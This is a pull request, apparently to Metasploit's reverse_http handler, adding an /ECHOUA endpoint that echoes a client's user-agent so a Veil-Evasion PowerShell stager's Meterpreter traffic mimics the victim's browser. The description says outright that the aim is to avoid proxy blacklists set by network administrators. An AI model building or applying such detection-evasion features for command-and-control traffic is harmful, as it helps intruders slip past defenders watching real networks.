### PR TITLE
Added ECHOUA URI request type to reflect victim UA string

### DIFF
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -238,7 +238,7 @@ protected
         blob.sub!('HTTP_COMMUNICATION_TIMEOUT = 300', "HTTP_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
         
         # Override default behavior with client's user agent if set and allowed
-        if datastore['AllowClientUserAgentOverride']==true && cli_ua != ""
+        if datastore['AllowClientUserAgentOverride']==true
             blob.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(req.headers['User-Agent'])}'")
         else
             blob.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(datastore['MeterpreterUserAgent'])}'")

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -239,7 +239,7 @@ protected
         
         # Override default behavior with client's user agent if set and allowed
         if datastore['AllowClientUserAgentOverride']==true && cli_ua != ""
-            blob.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(cli_ua)}'")
+            blob.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(req.headers['User-Agent'])}'")
         else
             blob.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(datastore['MeterpreterUserAgent'])}'")
         end

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -317,7 +317,16 @@ protected
           :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
           :ssl                => ssl?,
         })
-
+      when /^\/ECHOUA/
+        
+        # Request to echo back the user agent, useful to avoid detection
+        print_status("Reflecting the user agent and updating the meterpreter user agent")
+        
+        # Update the currently configured meterpreter UA to what came from the client
+	datastore['MeterpreterUserAgent'] = req.headers["User-Agent"]
+        resp.body="<html><body>"+ req.headers["User-Agent"] + "</body></html>"
+        resp.code    = 200
+        resp.message = "OK"
       when /^\/CONN_.*\//
         resp.body = ""
         # Grab the checksummed version of CONN from the payload's request.


### PR DESCRIPTION
When using Veil-Evasion powershell stager and the MSF reverse http handler, the user agent string is hard coded. Network administrators are starting to scour through Veil & metasploit code to find user agent strings to blacklist on their proxies. So, to avoid getting detected, I added a new response to the reverse_http handler that echos the client's user agent string back to it in html. This is used by the Veil-Evasion powershell payload to first, navigate to the MSF meterpreter handler to receive back its own user-agent, then begin setting up the meterpreter session using the user-agent.

I did it this way because it's not really possible to determine the user agent from just the installed version of IE. By establishing the connection looking like internet explorer, I think this could greatly reduce detections. 
